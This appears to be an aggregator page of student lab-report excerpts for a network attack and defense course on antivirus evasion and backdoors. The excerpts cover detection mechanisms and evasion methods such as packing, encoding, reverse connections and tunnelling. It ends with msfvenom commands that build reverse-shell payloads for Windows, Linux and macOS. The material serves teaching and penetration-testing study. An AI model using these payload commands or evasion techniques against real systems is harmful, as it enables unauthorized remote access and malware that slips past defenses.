msfvenom

2019-2020-2 网络对抗技术 20172327 Exp3 免杀原理与实践

主宰稳场 提交于 2020-04-04 04:11:01
目录 1. 实践基础 1.1 什么是恶意代码检测机制和免杀原理? 1.1.1 免杀原理 1.1.2 恶意代码检测机制 1.1.3 免杀技术综述 1.2 基础问题回答 2. 实践内容 2.1 学习正确使用msf编码器、msfvenom生成如jar之类的其他文件、veil、加壳工具、 使用C + shellcode编程以及课堂其他课堂为介绍方法 2.1.1 正确使用msf编码器,生成exe文件 2.1.2 msfvenom生成jar文件 2.1.3 msfvenom生成php文件 2.1.4 使用veil-evasion生成后门程序及检测 2.1.5 使用加壳工具尝试 2.1.6 使用C+shellcode编程 2.1.7 使用其他方法完成免杀 2.2 通过组合应用各种技术实现恶意代码免杀 2.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 4.1.3 总结与体会 1. 实践基础 1.1 什么是恶意代码检测机制和免杀原理? 1.1.1 免杀原理 免杀技术,全称为反杀毒技术(Anti Anti-Virus),是指对恶意软件的处理让其能够不被杀毒软件所检测,同时也是渗透测试中需要使用到的技术。 1.1.2 恶意代码检测机制 基于特征码的检测: 简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等

2019-2020-2 20175305张天钰《网络对抗技术》 Exp3 免杀原理与实践

半腔热情 提交于 2020-04-04 02:48:40
2019-2020-2 《网络对抗技术》 Exp3 免杀原理与实践 一 . 知识小结 免杀概念 一般是对恶意软件做处理,让它不被杀毒软件所检测。 基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测 一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出现的一段或多段代码,而且是其他正常程序没有的,即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。 启发式恶意软件检测 就是根据些片面特征去推断。通常是因为缺乏精确判定依据。(非精确) 基于行为的恶意软件检测 为加入了行为监控的启发式。通过对恶意代码的观察研究,发现有一些行为是恶意代码共同的比较特殊的行为,杀软会监视程序的运行,如果发现了这些特殊行为,就会认为其是恶意软件。(非精确) 免杀是做什么? 一般是对恶意软件做处理,让它不被杀毒软件所检测 免杀的基本方法有哪些? 改变特征码 只有EXE— 加壳(压缩壳 加密壳) 有shellcode(像Meterpreter)—利用encode进行编码 有源代码——用其他语言进行重写再编译 改变行为 通讯方式 尽量使用反弹式连接:meterpreter本身即主要使用反弹连接 使用隧道技术:如dns2tcp、iodine可将流量封闭为DNS协议包 加密通讯数据:如使用reverse-https进行转发 操作模式 基于内存操作

2019-2020-2 网络对抗技术 20175214 Exp3 免杀原理与实践

假如想象 提交于 2020-03-29 06:22:19
2019-2020-2 网络对抗技术 20175214 Exp3 免杀原理与实践 一、预备知识 1.恶意代码检测机制 (1)基于特征码的检测 简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。 (2)启发式恶意软件检测 “When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.” 对恶意软件检测来说,就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,那我们就把它当成一个恶意软件吧。典型的行为如连接恶意网站、开放端口、修改系统文件,典型的“外观”如文件本身签名、结构、厂商等信息等。各个厂商会定义自己的检测模式。 (3)基于行为的恶意软件检测 从理论上讲,基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式。 2.免杀原理(AV) (1)改变特征码 有EXE 加壳:压缩壳 加密壳 有shellcode(像Meterpreter) 用encode进行编码 基于payload重新编译生成可执行文件 有源代码 用其他语言进行重写再编译(veil-evasion) (2)改变行为 通讯方式 尽量使用反弹式连接 使用隧道技术 加密通讯数据

20175201张驰exp3——免杀原理与实践

无人久伴 提交于 2020-03-28 08:15:48
目录 一、学习目标 二、基础问题回答 三、实验步骤 1、使用msf编码器msfvenom生成后门程序 2、使用Msfvenom生成jar等其他文件 用下面的命令生成php文件 3、Veil-Evasion 4、用shellcode编程生成后门程序 5、加壳 三、实验遇到的问题 1、装veil的时候,缺少Python3.4的包。 2、没有找到hyperion.exe程序。 四、实验感想 一、学习目标 (1)正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) (2)通过组合应用各种技术实现恶意代码免杀(0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。) (3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5) 二、基础问题回答 1、杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。 启发式恶意软件检测:启发式Heuristic,简单来说

2019-2020-2 网络对抗技术 20175311胡济栋 Exp3 免杀原理与实践

醉酒当歌 提交于 2020-03-28 02:03:36
2019-2020-2 网络对抗技术 20175311胡济栋 Exp3 免杀原理与实践 目录 一、实验介绍 二、实验内容 任务一:学习正确使用msf编码器、msfvenom生成如jar之类的其他文件、veil、加壳工具、 使用C + shellcode编程以及课堂其他课堂为介绍方法(3分) 任务二:通过组合应用各种技术实现恶意代码免杀(0.5分) 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(0.5分) 三、实验要求 四、实验感想 一、实验介绍 1.免杀原理 免杀技术,全称为反杀毒技术(Anti Anti-Virus),是指对恶意软件的处理让其能够不被杀毒软件所检测,同时也是渗透测试中需要使用到的技术。 学习免杀就必须了解恶意软件检测工具是如何运作的,知己知彼,百战百胜。 2.恶意软件检测机制 基于特征码的检测 简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。 AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。 启发式恶意软件检测 启发式Heuristic,简单来说,就是根据些片面特征去推断,通常是因为缺乏精确判定依据。 对恶意软件检测来主说,就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件

2019-2020-2 20175320 《网络对抗技术》Exp3 后门原理与实践

江枫思渺然 提交于 2020-03-27 19:16:53
2019-2020-2 20175320 《网络对抗技术》Exp3 后门原理与实践 一、实验要求 了解metasploit、veil、加壳工具的使用方法,并利用以上软件实现后门程序与杀软之间的共存,并利用后门程序获取被攻击方的shell。 二、实验目标 1、正确使用msf编码器 2、msfvenom生成如jar之类的其他文件 3、使用veil进行免杀处理 4、使用upx加压缩壳,hyperion加加密壳 5、使用C + shellcode编程进行免杀 6、使用python + shellcode进行免杀(使用其他课堂未介绍方法) 7、通过组合应用各种技术实现恶意代码免杀 8、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 三、实验过程 1.准备工作 (1)安装veil 用 sudo apt-get install veil 命令安装veil,如果有问题可以尝试使用 sudo apt-get update 和 sudo apt-get upgrade 命令更新一下软件包。 安装完成后使用 veil 命令打开veil,输入Y继续安装直到完成。期间可能会因为网络问题下载中断,并且需要手动确认部分软件的安装,这一准备工作需要较长的时间。 (2)hyperion加密壳应用 由于我的kali系统里没有hyperion的文件夹

2019-2020-2 网络对抗技术 20175318 Exp3 免杀原理与实践

孤街浪徒 提交于 2020-03-27 12:18:51
一、免杀原理及基础问题回答 1.免杀原理 2.基础问题回答 3.免杀效果评价 二、实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 使用msf编码器生成各种后门程序及检测 使用veil-evasion生成后门程序及检测 半手工注入Shellcode并执行 使用其他课程未介绍的方法 任务二:通过组合应用各种技术实现恶意代码免杀 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 三、开启杀软能绝对防止电脑中恶意代码吗? 四、实验总结与体会 一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出现的一段或多段代码,而且是其他正常程序没有的,即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。

20175104 李屹哲 Exp3 免杀原理与实践

☆樱花仙子☆ 提交于 2020-03-26 13:22:44
0.实验准备 1.实践内容(4分) 1.1 方法(3分) - 正确使用msf编码器 (0.5分), - msfvenom生成如jar之类的其他文件 (0.5分), - veil (0.5分), - 加壳工具 (0.5分), - 使用C + shellcode编程 (0.5分), - 使用其他课堂未介绍方法 (0.5分) 1.2 通过组合应用各种技术实现恶意代码免杀 (0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。) 1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 (加分0.5) 2. 基础问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? (4)开启杀软能绝对防止电脑中恶意代码吗? 3. 实验感想 实验准备 1.免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础 。 2.免杀技术(Evading AV)综述 就常见恶意软件而言,一般AV的检出率为40%-98%。就算你用了最好的AV,恶意软件依然有1

2019-2020-2 网络对抗技术 20175217 Exp2 后门原理与实践

怎甘沉沦 提交于 2020-03-13 01:40:17
一、实验目标 清楚后门概念 会用nc获取远程主机的Shell 会用meterpreter 会启动后门 二、实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 三、基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 当捡到一个U盘时,会尝试着插入自己的电脑,当U盘插入后后门可能进入系统 当下载一个软件时,后门可能同时被安装在你的系统中了 当你在网页上点击一个按钮时,后门可能会被安装在你的电脑里 例举你知道的后门如何启动起来(win及linux)的方式? 在开机的时候自启动(Windows注册表) 被设置了定时启动(Linux的crontab) 作为服务启动 被其他主机控制,从而启动 Meterpreter有哪些给你映像深刻的功能? 除了本次实验中完成的获取被控主机的录音、录像、截图、键盘输入记录等功能,还有从被控主机上对相关的文件进行下载和上传,远程操控目标机上的程序运行等功能。

msfvenom各平台payload生成

狂风中的少年 提交于 2020-03-06 18:07:49
二进制 windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe > shell.exe windows下生成32位/64位payload时需要注意:以windows/meterpreter/reverse_tcp为例,该payload默认为32位,也可使用-a x86选项指定。如果要生成64位,则payload为windows/x64/meterpreter/reverse_tcp。 Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Linux -f elf > shell.elf Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform osx -f